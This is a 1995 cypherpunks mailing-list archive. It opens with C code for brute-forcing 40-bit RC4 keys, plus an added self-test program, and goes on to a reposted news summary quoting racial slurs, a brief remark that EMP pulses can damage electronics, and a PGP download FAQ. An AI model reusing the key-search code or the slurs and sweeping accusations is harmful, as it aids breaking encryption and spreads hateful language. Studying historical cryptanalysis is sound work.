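/* Decrypts buffer_ptr in place and compares it with the known text byte by
   byte.  Returns 1 if all buffer_len bytes match, 0 at the first mismatch. */
int rc4_eq(unsigned char *buffer_ptr, 
           unsigned char *known, 
           unsigned char *cypher_txt,
           int buffer_len, rc4_key *key)
{
  unsigned int t;
  unsigned int y = 0;
  unsigned char* state;
  unsigned int xorIndex;
  unsigned int counter;

  
  state = &key->state[0];

  /* counter+1 stands in for the RC4 index x, which is why buffer_len
     has to be less than 256 */
  for(counter=0;counter < buffer_len;counter++)
  {
    y = (state[counter+1] + y) & 0xFF;
    swap_byte(state[counter+1], state[y]);
    xorIndex = (state[counter+1] + state[y]) & 0xFF;
    buffer_ptr[counter] ^= state[xorIndex];
    if (known[counter] != buffer_ptr[counter])
    {
      /* mismatch: restore the bytes decrypted so far and give up */
      memcpy(buffer_ptr,cypher_txt,counter+1);
      return 0;
    }
  }
  return 1;
}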
--------------------------------------------------------------------------

Also, I could not get Russell's changes to work exactly as he posted
them (I suspect it's because I'm using a very old linux system).  Here's
my prepare_key function. I basically took out the counter++ parts.

--------------------------------------------------------------------------
/* excellent optimised prepare key by Tatu Ylonen ylo@cs.hut.fi */

void prepare_key(unsigned char *key_data_ptr, int key_data_len, rc4_key *key)
{
  unsigned int t;
  unsigned int index2;
  unsigned char* state;
  unsigned int counter;
  unsigned int k0, k1, k2, k3, k4;

  state = &key->state[0];
  memcpy(state,sequence,256);

  index2 = 0;
  k0 = key_data_ptr[0];
  k1 = key_data_ptr[1];
  k2 = key_data_ptr[2];
  k3 = key_data_ptr[3];
  k4 = key_data_ptr[4];
  for(counter = 0; counter < 255; counter+=5)
  {
    t = state[counter];
    index2 = (index2 + k0 + t) & 0xff;
    state[counter] = state[index2];
    state[index2] = t;


    t = state[counter + 1];
    index2 = (index2 + k1 + t) & 0xff;
    state[counter + 1] = state[index2];
    state[index2] = t;

    t = state[counter + 2];
    index2 = (index2 + k2 + t) & 0xff;
    state[counter + 2]  = state[index2];
    state[index2] = t;


    t = state[counter + 3];
    index2 = (index2 + k3 + t) & 0xff;
    state[counter + 3] = state[index2];
    state[index2] = t;


    t = state[counter + 4];
    index2 = (index2 + k4 + t) & 0xff;
    state[counter + 4]  = state[index2];
    state[index2] = t;

  }
  /* last entry: 255 % 5 == 0, so key byte k0 is used again */
  t = state[255];
  index2 = (index2 + k0 + t) & 0xff;
  state[255] = state[index2];
  state[index2] = t;

}
------------------------------------------------------------------------

_____________________________________________________________________________
 
 Tim Nali            \  "We are the music makers, and we are the dreamers of
 tn0s@andrew.cmu.edu  \   the dreams" -Willy Wonka and the Chocolate Factory
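
Added example, not part of Tim Nali's post or of bruterc4.c: a self-contained C check that a 5-byte key setup unrolled as in the message, and an early-exit compare that uses counter + 1 as the RC4 index, give the same results as a textbook RC4. The struct layout, function names, sample keys and sample plaintext are assumptions made for this example; the length guard enforces the "less than 256 bytes" assumption stated in the post.

```c
#include <stdio.h>
#include <string.h>
typedef struct { unsigned char state[256]; } rc4_key;   /* assumed layout */

/* Textbook key setup (KSA) for a key of any length. */
static void ref_prepare_key(const unsigned char *k, unsigned int klen, rc4_key *key) {
    unsigned int i, j = 0;
    unsigned char t, *s = key->state;
    for (i = 0; i < 256; i++) s[i] = (unsigned char)i;
    for (i = 0; i < 256; i++) {
        j = (j + s[i] + k[i % klen]) & 0xFF;
        t = s[i]; s[i] = s[j]; s[j] = t;
    }
}

/* Textbook keystream XOR (PRGA); starts at x = y = 0, so use once per key setup. */
static void ref_crypt(unsigned char *buf, unsigned int len, rc4_key *key) {
    unsigned int x = 0, y = 0, n;
    unsigned char t, *s = key->state;
    for (n = 0; n < len; n++) {
        x = (x + 1) & 0xFF; y = (y + s[x]) & 0xFF;
        t = s[x]; s[x] = s[y]; s[y] = t;
        buf[n] ^= s[(s[x] + s[y]) & 0xFF];
    }
}

#define STEP(i, kb) do { t = s[i]; j = (j + (kb) + t) & 0xFF; \
                         s[i] = s[j]; s[j] = (unsigned char)t; } while (0)

/* Key setup unrolled for a 5-byte key: 51 rounds of five steps cover indices
 * 0..254; index 255 takes k[0] again because 255 % 5 == 0. */
static void unrolled_prepare_key(const unsigned char k[5], rc4_key *key) {
    unsigned int c, t, j = 0;
    unsigned char *s = key->state;
    for (c = 0; c < 256; c++) s[c] = (unsigned char)c;
    for (c = 0; c < 255; c += 5) {
        STEP(c, k[0]); STEP(c + 1, k[1]); STEP(c + 2, k[2]); STEP(c + 3, k[3]); STEP(c + 4, k[4]);
    }
    STEP(255, k[0]);
}

/* Decrypt-and-compare with early exit. c + 1 is the RC4 index x only while
 * len < 256, so the guard enforces it. Returns 1 match, 0 mismatch, -1 bad len. */
static int early_exit_eq(unsigned char *buf, const unsigned char *known,
                         const unsigned char *cipher, int len, rc4_key *key) {
    unsigned int c, t, y = 0;
    unsigned char *s = key->state;
    if (len < 0 || len > 255) return -1;
    for (c = 0; c < (unsigned int)len; c++) {
        y = (y + s[c + 1]) & 0xFF;
        t = s[c + 1]; s[c + 1] = s[y]; s[y] = (unsigned char)t;
        buf[c] ^= s[(s[c + 1] + s[y]) & 0xFF];
        if (buf[c] != known[c]) { memcpy(buf, cipher, c + 1); return 0; }
    }
    return 1;
}

/* 1 if the textbook code gives the published vector for "Key" / "Plaintext". */
static int check_reference_vector(void) {
    static const unsigned char want[9] = { 0xBB, 0xF3, 0x16, 0xE8, 0xD9, 0x40, 0xAF, 0x0A, 0xD3 };
    unsigned char buf[9]; rc4_key key;
    memcpy(buf, "Plaintext", 9);
    ref_prepare_key((const unsigned char *)"Key", 3, &key);
    ref_crypt(buf, 9, &key);
    return memcmp(buf, want, 9) == 0;
}

/* 1 if the unrolled setup builds the same table as the textbook setup. */
static int check_key_setup(const unsigned char k[5]) {
    rc4_key a, b;
    ref_prepare_key(k, 5, &a);
    unrolled_prepare_key(k, &b);
    return memcmp(a.state, b.state, 256) == 0;
}

/* Encrypts a constructed sample under enc_key with the textbook code, then runs
 * the optimised pair with try_key. Returns early_exit_eq's result, or -2 if a
 * mismatch left the work buffer different from the ciphertext. */
static int check_early_exit(const unsigned char enc_key[5], const unsigned char try_key[5]) {
    static const unsigned char known[] = "constructed known plaintext";
    unsigned char cipher[sizeof known], buf[sizeof known];
    rc4_key key; int r;
    memcpy(cipher, known, sizeof known);
    ref_prepare_key(enc_key, 5, &key);
    ref_crypt(cipher, sizeof known, &key);
    memcpy(buf, cipher, sizeof known);
    unrolled_prepare_key(try_key, &key);
    r = early_exit_eq(buf, known, cipher, (int)sizeof known, &key);
    return (r == 0 && memcmp(buf, cipher, sizeof known) != 0) ? -2 : r;
}

int main(void) {
    static const unsigned char a[5] = { 1, 2, 3, 4, 5 }, b[5] = { 1, 2, 3, 4, 6 };
    int ok = check_reference_vector() && check_key_setup(a) &&
             check_early_exit(a, a) == 1 && check_early_exit(a, b) == 0;
    puts(ok ? "optimised routines agree with textbook RC4" : "MISMATCH");
    return ok ? 0 : 1;
}
```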






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alt@iquest.net (Al Thompson)
Date: Tue, 11 Jul 95 20:02:51 PDT
To: cypherpunks@toad.com
Subject: Re: RACIST MILITIA: ATF
Message-ID: <m0sVs4F-000BYfC@dorite1.iquest.net>
MIME-Version: 1.0
Content-Type: text/plain



>> From owner-roc@xmission.com Tue Jul 11 11:10:37 1995
>> Date: Tue, 11 Jul 1995 13:45:37 -0400 (EDT)
>> From: Ian Goddard <igoddard@CapAccess.org>
>> To: Libernet@Dartmouth.edu
>> 
>
>Header deleted for brevity
>
>> (please re-post)
>>                
>> 		 ATF SUMMER CAMP A HOTBED OF RACIAL HATE
>> 
>> The Washington Times (7/11/95) reports that despite a pending lawsuit 
>> against the ATF for racism, a summer camp for ATF agents called the 
>> "Good O' Boys Roundup" was still awash with racist sentiment. 
>> 
>> All who attended were welcomed at the entrance with many racist signs,
>> including one that read: 
>> 
>>                         "Nigger Check Point" 
>> 
>> The ATF camp maintains a whites only policy. All black ATF agents who
>> attempted to attend were turned away. White agents inside were reportedly
>> "real mad" about the attempts of black agents to attend. That the signs
>> were hung at the entrance indicates that all who attended had no problem
>> with the ATF's promotion of hard-core racism at the retreat. 
>> 
>> There were many T-shirts promoting racial hatred and murder on sale at the
>> ATF summer camp, such as one with a target superimposed over the face of
>> Martin Luther King Jr. It would seem that the ATF approves of the killing
>> of Dr. King. 
>> 
>> Also available at the ATF hate camp were "Nigger Hunting Licenses." 
>> If promoting the murder of black leaders is not bad enough, ATF agents
>> even promote random killings of blacks. 
>> 
>> In a vain attempt to distance the ATF from the promotion of racial hate
>> and murder at the ATF summer camp, ATF spokesman Earl Woodham claimed the
>> event has never been sanctioned by the ATF. However, for years the local 
>> ATF office has been the place to send in registration fees and to call 
>> for info about the ATF summer hate camp. The agents at this office declined
>> to say if they ever attended one of the "round ups" over the years. 
>> 
>> One ATF official said "I am not surprised about the signs or other
>> activities [at the camp]."  A former law enforcement officer who has attended the
>> camp this year and in the past said, "The roundup has been a place for law
>> enforcement personnel to go and let their hair down." So it would seem that
>> hatred and a lust for murdering oppressed people reflects the true nature
>> of these "law enforcement" personnel. "Jack-booted thugs" is soft-balling it.
>> 
>> The pending lawsuit launched by 15 plaintiffs charges that KKK information
>> and "Nigger Hunting Licenses" have been displayed in many ATF offices. The
>> suit also claims widespread racial slurs and harassment by ATF personnel.
>> 
>> All information presented here is derived from The Washington Times
>> (7/11/95) front page article "Racist ways die hard at lawmen's retreat."
>> 
>> PLEASE RE-POST FAR AND WIDE
>> 
>> -- Ian Goddard <igoddard@cap.gwu.edu>
>> 
>> 
>
>
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alano@teleport.com (Alan Olsen)
Date: Tue, 11 Jul 95 22:05:20 PDT
To: cypherpunks@toad.com
Subject: Re: PGP Anti- ITAR sig
Message-ID: <199507120505.WAA26898@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain



>This is 1/713 of PGP262i DOS Executable Zipfile UUE'd

Collect the entire set!

|     "Ignorance is no excuse for the law."       | alano@teleport.com   |
|"Would you rather be tortured by the government  | Disclaimer:          |
|forces or the people's liberation army?" -mklprc | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|  Free Tibet! (With two proofs of purchase)      |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Tue, 11 Jul 95 20:29:18 PDT
To: erc@khijol.intele.net (Ed Carp [khijol Sysadmin])
Subject: Re: Don't trust the net too much
In-Reply-To: <Pine.3.89.9507102023.H1184-0100000@khijol>
Message-ID: <199507120328.XAA02985@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



| > hundred dollars worth of transmitter parts, you can cause transient
| > failures with EMF pulse weapons, and for a bit more, you can fry all
| > the electronics, then drive away before they have any idea that their

| worth of parts.  Could you be more specific?

| > 	Go read Winn Schwartau's book "Information Warfare"  Then go
| > read Sun Tzu.
| 
| I have.  I agree, killing people is dumb, but try telling that to your 

	More specifically, few sensitive electronic items are
hardened against electromagnetic pulses.  Ever see a speaker interfere
with your TV set?  Build a big enough speaker, and you can screw with
your computer's memory.  (Of course, if you just use an electromagnet,
and not bother to build a speaker around it, you'll be much more
energy efficient. :) A big enough pulse can confuse just about any
hardware; bigger pulses still can destroy it.  Directed (or
undirected) pulses are easy to produce with the right amps.

	Again, check out Schwartau; your local library probably has
him.

Adam


-- 
"It is seldom that liberty          I Support The Phil
of any kind is lost all at     Zimmermann legal defense fund
once."               -Hume    http://www.netresponse.com/zldf

------------------ PGP.ZIP Part [001/713] -------------------
M4$L#!!0````(`">9ZQX3(*,_DG8!`-JF`P`'````4$=0+D581>S;=UQ3U__X
M\9M!$E8,TT@PJ$10$1=*41%WW`KX$=Q[M5KK`&R%(HH+(T.M"S>NME8K=31N
M:A$[K+5(K:O5BE405ZE:1"3?UTW`:K_]\/G\?O_^?CX>3^_-S;GGO,^\`^@W
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Tue, 11 Jul 95 21:05:15 PDT
To: cypherpunks@toad.com
Subject: Re: RACIST MILITIA: ATF
Message-ID: <199507120402.AAA11172@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

I'm sure that this will be widely covered in the media.

_NOT_!

[Prediction: *Gentle* wrist slaps, *nobody* fired, promotions.]

Also, are there any C-punks in south Florida right now (besides me)?
If so, please respond by private e-mail. Thanks.

Regards,
JMR


- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMANHyG1lp8bpvW01AQFUBgP/cNxu8ead5MBGtggEwR/80a0DmA1fUgmy
X2xJpXCu7NUGT2rPZR9jni1guBOVHKypC6ZsaW3jDpaENX/l/2YxrE6nakVKR9qm
ae46QZC23Lm155ieOOBT8V50MglkWuYhgDf9+w/JxmS11R26pYNezgzuqNsLCGdg
6hq7WK6+t8c=
=S2pc
- -----END PGP SIGNATURE-----

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMANJJioZzwIn1bdtAQE53QGAoOMNWiua7qQp7OD5g8Ok8WsX4EnPtjL3
jU6ONKYHJrhBnNAMPn7z67B/NeGevq5Q
=/U9Z
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Paul Johnson <mpj@netcom.com>
Date: Wed, 12 Jul 95 00:25:29 PDT
To: Where to get PGP list <viacrypt@acm.org
Subject: Where to get the latest PGP
Message-ID: <Pine.SUN.3.91.950712002231.6230A-100000@netcom20>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

WHERE TO GET THE PRETTY GOOD PRIVACY PROGRAM (PGP) FAQ 12 JULY 1995

(Long version)


WHAT IS THE LATEST VERSION OF PGP?
BUG
WHERE CAN I GET VIACRYPT PGP?
WHERE CAN I FTP PGP IN NORTH AMERICA?
WHERE IS PGP ON THE WORLD WIDE WEB?
WHERE IS PGP ON COMPUSERVE?
AOL
WHAT BULLETIN BOARD SYSTEMS CARRY PGP?
WHERE CAN I FTP PGP CLOSE TO ME?
HOW CAN I GET PGP BY EMAIL?
WHERE IS MACPGP?
WHERE IS VAX PGP?
WHERE CAN I GET MORE PGP INFORMATION?
WHAT ARE SOME GOOD PGP BOOKS?
WHERE CAN I GET PGP LANGUAGE MODULES?
IS PGP LEGAL?
WHAT IS PHILIP ZIMMERMANN'S LEGAL STATUS?
WHERE CAN I GET WINDOWS & DOS SHELLS FOR PGP?
WHERE CAN I GET THE MACPGP KIT?
WHERE IS THE PGP 3.0 API DRAFT?
WHAT OTHER FILE ENCRYPTION (DOS, MAC) TOOLS ARE THERE?
HOW DO I SECURELY DELETE FILES (DOS)?
WHAT DO I DO ABOUT THE PASS PHRASE IN MY WINDOWS SWAP FILE?
WHAT EVER HAPPENED TO PGPfone(tm)?
WHERE DO I GET NAUTILUS?
HOW DO I ENCRYPT MY DISK ON-THE-FLY?
WHERE IS PGP'S COMPETITION?
HOW DO I PUBLISH MY PGP PUBLIC KEY?
WHICH FAQ IS THE OFFICIAL ONE?
CAN I COPY AND REDISTRIBUTE THIS FAQ?

For questions not covered here, please see the MAIN alt.security.pgp FAQ at
ftp://ftp.prairienet.org/pub/providers/pgp/pgpfaq.txt


WHAT IS THE LATEST VERSION OF PGP?


Platform(s)       Latest Version        Distribution File Names
__________________________________________________________________________
|                |                     |                                 |
|DOS, Unix,      | Viacrypt PGP 2.7.1  | disk sets                       |
|Mac, Windows,   |                     |                                 |
|or WinCIM/CSNav |                     |                                 |
|________________|_____________________|_________________________________|
|                |                     |                                 |
|Hardware-based  | Viacrypt 2.7.1      | disk sets                       |
|PGP/Token       |                     |                                 |
|________________|_____________________|_________________________________|
|                |                     |                                 |
|DOS, Unix, VAX, | MIT PGP 2.6.2       | pgp262.zip  (DOS + docs)        |
|others          |                     | pgp262s.zip (source)            |
|                |                     | pg262s.zip source on CompuServe |
|                |                     | pgp262s.tar.gz (source)         |
|                |                     | pgp262s.tar.Z (source)          |
|                |                     | pgp262dc.zip (documentation)    |
|                |                     | pg262d.zip (docs on CompuServe) |
|________________|_____________________|_________________________________|
|                |                     |                                 |
|Macintosh       | MIT PGP 2.6.2       | MacPGP2.6.2-130v1.hqx           |
|                | Mac version 1.3.0   | m262pgp.hqx (same as above)     |
|                |                     | MacPGP2.6.2-130v1.source.asc    |
|                |                     | m262pgps.asc (same as above)    |
|________________|_____________________|_________________________________|
|                |                     |                                 |
|Power Mac       | Zbigniew's "beta"   | Fatmacpgp262b131.sea.hqx        |
|                |                     | f262pgp.hqx (same as above)     |
|                |                     | Fatmacpgp262b131.src.hqx        |
|                |                     | f262pgps.hqx (same as above)    |
|________________|_____________________|_________________________________|
|                |                     |                                 |
|Amiga           | PGP 2.6.2 Amiga 1.4 | pgp262-a14-000.lha              |
|                |                     | pgp262-a14-020.lha              |
|                |                     | pgp262-a14-src.lha              |
|                |                     | PGPAmi262is.lha (international) |
|________________|_____________________|_________________________________|
|                |                     |                                 |
|Atari           | Atari MIT PGP 2.6.2 | pgp262st.zip                    |
|                | Atari International | pgp262ib.zip                    |
|________________|_____________________|_________________________________|
|                |                     |                                 |
|OS/2            | MIT PGP 2.6.2       | pgp262-os2.zip                  |
|                |                     | on ftp.gibbon.com               |
|________________|_____________________|_________________________________|
|                |                     |                                 |
|Non-USA version | PGP 2.6.2i from     | pgp262i.zip                     |
|to avoid RSAREF | Stale Schumacher    | pgp262is.zip                    |
|license.        |                     | pgp262is.tar.gz                 |
|                |                     | pgp262i-os2.zip                 |
|                |                     | pgp262i-djgpp.zip               |
|                |                     |                                 |
|                | Canadian "mutant"   | MacPGP262ca124.exe.sea.hqx      |
|                | not for USA use     | MacPGP262ca124.src.sea.hqx      |
|________________|_____________________|_________________________________|



BUG
Digital signatures made with keys 2034-2048 bits in length may
be corrupt if made by any version of PGP released prior to May
1995.  To fix this in the source code, change the line in
function make_signature_certificate in crypto.c from

byte inbuf[MAX_BYTE_PRECISION], outbuf[MAX_BYTE_PRECISION];
to
byte inbuf[MAX_BYTE_PRECISION], outbuf[MAX_BYTE_PRECISION+2];


WHERE CAN I GET VIACRYPT PGP?

Viacrypt has versions of PGP complete with licenses for
commercial use of the RSA and IDEA encryption algorithms.
Viacrypt PGP comes in executable code only (no source code),
but it is based on (and just as secure as) the freeware PGP.
Viacrypt PGP for Windows is the only real Windows PGP (and even
it is partially a quickwin executable that looks like a DOS
port).  Still, it is much better from an interface standpoint
than all the others.

Please contact ViaCrypt for pricing (about $100 up), the latest
platforms, and availability at 800-536-2664 8:30am to 5:00pm
MST, Monday - Friday.  They accept VISA, MasterCard, AMEX and
Discover credit cards.

If you have further questions, please ask:

Paul E. Uhlhorn
Director of Marketing, ViaCrypt Products
Mail:          9033 N. 24th Avenue
Suite 7
Phoenix AZ 85021-2847
Phone:         (602) 944-0773
Fax:           (602) 943-2601
Internet:      viacrypt@acm.org
Compuserve:    70304.41


WHERE CAN I FTP PGP IN NORTH AMERICA?

If you are in the USA or Canada, you can get PGP by following the
instructions in any of:

ftp://net-dist.mit.edu/pub/PGP/README
ftp://ftp.csn.net/mpj/README.MPJ
ftp://miyako.dorm.duke.edu/pub/GETTING_ACCESS
ftp://ftp.netcom.com/pub/mp/mpj/README.MPJ
ftp://ftp.netcom.com/pub/dd/ddt/crypto/READ_ME_FIRST!
ftp://ftp.netcom.com/pub/dd/ddt/crypto/pgp_ftp_instructions.txt
ftp://ftp.eff.org

Follow the instructions found in README.Dist that you get from one of:

ftp://ftp.eff.org/pub/Net_info/Tools/Crypto/README.Dist
gopher.eff.org, 1/Net_info/Tools/Crypto
gopher://gopher.eff.org/11/Net_info/Tools/Crypto
http://www.eff.org/pub/Net_info/Tools/Crypto/
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/pgp/
ftp://ftp.gibbon.com/pub/pgp/README.PGP
(OS/2 users see also /pub/gcp/gcppgp10.zip)
ftp://ftp.wimsey.bc.ca/pub/crypto/software/README


WHERE IS PGP ON THE WORLD WIDE WEB?

http://web.mit.edu/network/pgp-form.html
http://www.ifi.uio.no/~staalesc/PGP/home.html
http://rschp2.anu.edu.au:8080/crypt.html
http://www.eff.org/pub/Net_info/Tools/Crypto/
http://community.net/community/all/home/solano/sbaldwin
http://www.cco.caltech.edu/~rknop/amiga_pgp26.html
http://www.csua.berkeley.edu/cypherpunks/home.html
http://www.leo.org/archive/os2/crypt/
http://colossus.net/wepinsto/wshome.html


WHERE IS PGP ON COMPUSERVE?

GO NCSAFORUM.  Follow the instructions there to gain access to
Library 12: Export Controlled.

Compuserve file names are limited, so look for PGP262.ZIP,
PG262S.ZIP (source code), PGP262.GZ (Unix source code) and
PG262D.ZIP (documentation only).


AOL

Go to the AOL software library and search "PGP" or ftp from

ftp://ftp.csua.berkeley.edu/pub/cypherpunks/pgp.


WHAT BULLETIN BOARD SYSTEMS CARRY PGP?

MANY BBS carry PGP.  The following carry recent versions of PGP
and allow free downloads of PGP.

USA

303-343-4053 Hacker's Haven, Denver, CO Lots of crypto stuff here.
303-772-1062 Colorado Catacombs BBS, Longmont CO
8 data bits, 1 stop, no parity, up to 28,800 bps.
Use ANSI terminal emulation.
For free access: log in with your own name, answer the questions.
303-914-0031 The FreeMatrix ]I[
314-896-9309 The KATN BBS
317-791-9617 Computer Virus Research Center (CVRC) BBS, Indianapolis, IN
Login Name: PGP USER  Password: PGP
501-791-0124, 501-791-0125 The Ferret BBS, North Little Rock, AR
Login name: PGP USER  Password: PGP
508-668-4441 Emerald City, Walpole, MA
601-582-5748 CyberGold BBS
612-690-5556, !CyBERteCH SeCURitY BBS! Minneapolis MN, - write a letter
to the sysop requesting full access.
914-667-4567 Exec-Net, New York, NY
915-587-7888, Self-Governor Information Resource, El Paso, Texas

UK

01273-688888

GERMANY

+49-781-38807 MAUS BBS, Offenburg - angeschlossen an das MausNet
+49-521-68000 BIONIC-BBS Login: PGP


WHERE CAN I FTP PGP CLOSE TO ME?

AU

ftp://ftp.cc.adfa.oz.au/pub/security/pgp23/macpgp2.3.cpt.hqx
ftp://ftp.iinet.net.au:mirrors/pgp (Australia ONLY)
ftp://plaza.aarnet.edu.au/micros/mac/umich/misc/documentation/howtomacpgp2.7.txt

DE

ftp://ftp.informatik.tu-muenchen.de/pub/comp/os/os2/crypt
ftp://ftp.informatik.uni-hamburg.de/pub/virus/crypt/pgp
ftp://ftp.fu-berlin.de/mac/sys/init/MacPGP2.6uiV1.2en.cpt.hqx.gz
ftp://ftp.tu-clausthal.de/pub/atari/misc/pgp/pgp261b.lzh
ftp://ftp.uni-kl.de/pub/aminet/util/crypt
ftp://ftp.uni-paderborn.de/pub/aminet/util/crypt
ftp://ftp.westfalen.de/pd/Atari/Pgp  (Atari)
ftp://tupac-amaru.informatik.rwth-aachen.de

ES

ftp://goya.dit.upm.es

IT

ftp://ftp.dsi.unimi.it/pub/security/crypt/PGP

FI

ftp://ftp.funet.fi/pub/crypt

NL

ftp://ftp.nl.net/pub/crypto/pgp
ftp.nic.surfnet.nl/surfnet/net-security/encryption/pgp

NZ

ftp://kauri.vuw.ac.nz
ftp://rs950.phys.waikato.ac.nz/pub/incoming/pgp (New Zealand ONLY)

SE

ftp://leif.thep.lu.se

TW

ftp://nctuccca.edu.tw/PC/wuarchive/pgp/

UK

ftp://ftp.demon.co.uk/pub/amiga/pgp
ftp://ftp.ox.ac.uk/pub/crypto/pgp
ftp://src.doc.ic.ac.uk/aminet/amiga-boing
ftp://unix.hensa.ac.uk/pub/uunet/pub/security/virus/crypt/pgp

USA

ftp://atari.archive.umich.edu/pub/atari/Utilities/pgp261st.zip (Atari)
ftp://ftp.leo.org/pub/comp/os/os2/crypt
ftp://wuarchive.wustl.edu/pub/aminet/util/crypt
ftp://ftp.netcom.com/pub/gr/grady/PGP_NOT_FOR_EXPORT/MacPGP262ca124.exe.sea.hqx
ftp://ftp.netcom.com/pub/gr/grady/PGP_NOT_FOR_EXPORT/MacPGP262ca124.src.sea.hqx

ZA

ftp://ftp.ee.und.ac.za/pub/crypto/pgp
/pub/archimedes
/pub/pgp
/pub/mac/MacPGP


HOW CAN I GET PGP BY EMAIL?

If you have access to email, but not to ftp, send a message
saying "help" to
ftpmail@decwrl.dec.com,
mailserv@nic.funet.fi, or
ftp-request@netcom.com

To get pgp 2.6.2i by email:

Send a message to hypnotech-request@ifi.uio.no with your request in the
Subject: field.

Subject              What you will get

GET pgp262i.zip      MS-DOS executable (uuencoded)
GET pgp262is.zip     MS-DOS source code (uuencoded)
GET pgp262is.tar.gz  UNIX source code (uuencoded)


For FAQ information, send e-mail to

mail-server@rtfm.mit.edu with
send usenet/news.answers/ftp-list/faq
in the body of the message.


WHERE IS MACPGP?

ftp://ftp.csn.net/mpj/README.MPJ
ftp://ftp.confusion.net/pub/pgp/mac-pgp/README
ftp://highway.alinc.com/users/jordyn/mac-pgp/README
ftp://miyako.dorm.duke.edu/pub/GETTING_ACCESS


WHERE IS VAX PGP?

Get the full PGP distribution, then get VAXPGP262.TAR.Z from
the berkeley site for additional files needed to compile PGP
for the VAX and a precompiled version for VAX/VMS 5.5-2.


WHERE CAN I GET MORE PGP INFORMATION?

ftp://ftp.prairienet.org/pub/providers/pgp/pgpfaq.txt
ftp://starfire.ne.uiuc.edu/preston/pgpquick.ps (and pgpquick.doc)
http://www.prairienet.org/~jalicqui/
http://www.mit.edu:8001/people/warlord/pgp-faq.html
http://draco.centerline.com:8080/~franl/crypto.html
http://draco.centerline.com:8080/~franl/pgp/bug0.html
http://www.eff.org/pub/EFF/Issues/Crypto/ITAR_export/cryptusa_paper.ps.gz
http://www.eff.org/pub/EFF/Issues/Crypto/ITAR_export/cryptusa.paper
http://www.cco.caltech.edu/~rknop/amiga_pgp26.html
Email
pgp-help@hks.net
ftp://ds.internic.net/internet-drafts/draft-pgp-pgpformat-00.txt
ftp://ds.internic.net/internet-drafts/draft-ietf-pem-mime-08.txt
http://www.cis.ohio-state.edu/
ftp://ftp.csn.net/mpj/public/pgp/MacPGP262_manual.sit.hqx
http://www-mitpress.mit.edu/mitp/recent-books/comp/pgp-source.html
http://web.cnam.fr/Network/Crypto/ (c'est en Francais)
http://web.cnam.fr/Network/Crypto/survey.html (en Anglais)
http://www2.hawaii.edu/~phinely/MacPGP-and-AppleScript-FAQ.html
ftp://ftp.prairienet.org/pub/providers/pgp/pgpbg11.asc (Beginner's Guide)
Beginner's Guide: send email to
slutsky@lipschitz.sfasu.edu, subject: bg2pgp


WHAT ARE SOME GOOD PGP BOOKS?

Protect Your Privacy: A Guide for PGP Users
by William Stallings
Prentice Hall PTR
ISBN 0-13-185596-4
US $19.95
This is a good technical manual for PGP for most users, and makes a better
reference than the "official" documentation that comes with PGP.  I recommend
it highly.

PGP: Pretty Good Privacy
by Simson Garfinkel
O'Reilly & Associates, Inc.
ISBN 1-56592-098-8
US $24.95

E-Mail Security: How to Keep Your Electronic Mail Private
"Covers PGP/PEM"
by Bruce Schneier
Wiley Publishing

The Computer Privacy Handbook: A Practical Guide to E-Mail Encryption, Data
Protection, and PGP Privacy Software
by Andre Bacard
Peachpit Press
ISBN 1-56609-171-3
US$24.95
800-283-9444 or 510-548-4393

This is an interesting book on the sociology and politics of privacy in the
computer age as well as a practical manual on using PGP.  Must reading for
all members of Congress, presidential staff, members of Parliament, and
ordinary citizens who would like to take reasonable steps to protect
themselves from some forms of crime that have been made easy by technology.


THE OFFICIAL PGP USER'S GUIDE
by Philip R. Zimmermann
MIT Press
April 1995 - 216 pp. - paper - $14.95(US) - ISBN 0-262-74017-6 ZIMPP
Standard PGP documentation neatly typeset and bound.

PGP SOURCE CODE AND INTERNALS
by Philip R. Zimmermann
April 1995 - 804 pp. -
$55.00(US) - 0-262-24039-4 ZIMPH
This is a handy printed reference with commented source code for PGP 2.6.2
with great educational value.  This is a great way to study some of the
computer science and information theory behind the world's best email privacy
tool without having either a computer or reams of printouts handy.
Recommended reading on long airline flights for serious students of computer
science and computer security.

Ordering information for the last two books:
Call US Toll Free 1-800-356-0343 or 617-625-8569.
Cite code 5CSC and number 661.
Allow 4-6 weeks for delivery within North America.
Allow 8-12 weeks for delivery outside of North America.

How to Use PGP, 61 pages,  (Pub #121) from the Superior Broadcasting Company,
Box 1533-N, Oil City, PA 16301, phone: (814) 678-8801 (about $10-$13).


WHERE CAN I GET PGP LANGUAGE MODULES?

These are suitable for most PGP versions.

http://www.ifi.uio.no/~staalesc/PGP/language.html
German

ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp23_german.txt
ftp://ftp.csn.net/mpj/public/pgp/pgp_german.txt
ftp://ftp.csn.net/mpj/public/pgp/PGP_german_docs.lha
ftp://ftp.informatik.uni-hamburg.de:/pub/virus/crypt/pgp/language/pgp_german.asc
ftp://ftp.leo.org/pub/comp/os/os2/crypt/pgp262i-german.zip

Italian

ftp://ftp.dsi.unimi.it/pub/security/crypt/PGP/pgp-lang.italian.tar.gz
ftp://ftp.funet.fi/pub/crypt/ghost.dsi.unimi.it/PGP/pgp-lang.italian.tar.gz
ftp://ftp.csn.net/mpj/public/pgp/pgp-lang.italian.tar.gz

Japanese

ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp23_japanese.tar.gz
